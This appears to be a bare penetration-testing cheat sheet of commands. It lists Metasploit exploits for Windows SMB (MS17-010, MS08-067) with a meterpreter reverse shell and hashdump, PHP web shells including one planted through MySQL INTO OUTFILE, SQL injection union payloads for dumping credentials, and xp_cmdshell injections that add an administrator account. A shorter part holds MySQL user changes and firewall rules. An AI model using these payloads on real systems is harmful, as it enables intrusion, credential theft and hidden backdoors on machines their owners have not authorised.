msfconsole use exploit/windows/smb/ms17_010_psexec
exploit/windows/smb/ms08_067_netapi
exploit/windows/smb/psexec
auxiliary/admin/mssql/mssql_exec
auxiliary/scanner/mssql/mssql_login
set RHOST 172.16.164.254 exploit
set payload windows/meterpreter/reverse_tcp
run getgui -e run hashdump download
<?php @eval($_GET['cmd']);?>
select "<?php $cmd=$_GET['cmd'];system($cmd);?>" INTO OUTFILE /var/www/html/b.php';
service mysqld restart
$query=mysqli_query($conn,$sql);
$query=mssql_query($sql);
update user set password=PASSWORD('123.com') where user='root';
update user set host='%' where user='root' and host='localhost';
alter table zhuru add primary key (name);
alter table zhuru add unique (name);
alter table zhuru drop primary key;
union select 1,database()
union select table_name,2,3 from information_schema.tables where table_schema=database
union select column_name,2,3 from information_schema.columns where table_name=table
UNION SELECT username,password,3 from table
test' or '1'='1';exec master.dbo.xp_cmdshell 'net user admin 123456.com /add'--
test' or '1'='1';exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'--
iptables -A INPUT -p ICMP -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
netsh firewall reset
iptables -A INPUT -j REJECT
netsh firewall add portopening protocol=TCP port=80 name=web
netsh firewall add TCP 80 web
netsh advfirewall reset
netsh advfirewall firewall delete name=all
netsh advfirewall firewall add rule name=all80 protocol=TCP dir=in localport=80 action=allow
netsh advfirewall firewall add rule name=icmp4 protocol=icmpv4 dir=in action=allow